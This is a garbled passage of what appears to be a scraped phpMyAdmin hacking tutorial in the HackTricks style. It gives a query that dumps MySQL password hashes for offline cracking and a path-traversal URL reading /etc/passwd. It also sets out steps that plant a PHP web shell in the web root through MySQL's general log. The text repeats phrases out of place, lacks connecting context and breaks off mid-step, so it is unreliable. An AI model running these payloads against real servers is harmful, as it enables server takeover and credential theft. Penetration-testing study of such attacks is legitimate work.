Phpmyadmin Hacktricks Site

phpMyAdmin is the world’s most popular MySQL/MariaDB administration tool. While it is a godsend for database administrators, it is a prime target for penetration testers. Misconfigurations, default installations, weak credentials, and outdated versions often turn it into the "golden key" that leads to Remote Code Execution (RCE), privilege escalation, and full server compromise.

This article follows the HackTricks methodology—practical, hands-on, and scenario-driven. We will explore how to identify, exploit, and leverage phpMyAdmin in a controlled, ethical environment. phpmyadmin hacktricks

Disclaimer: This content is for educational and authorized security testing only. Unauthorized access to computers is illegal. Disclaimer: This content is for educational and authorized

SELECT user, authentication_string FROM mysql.user;

Crack them with John or Hashcat (caching_sha2_password is tougher, but mysql_native_password is crackable). SELECT user, authentication_string FROM mysql

Example:

http://example.com/phpmyadmin/libraries/tcpdf/tcpdf.php?tcpdf_import=../../../../etc/passwd

If secure_file_priv is set (prevents INTO OUTFILE), use the general log method:

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT '<?php system($_GET["cmd"]); ?>';
SET GLOBAL general_log = 'OFF';

Check config.inc.php (often readable):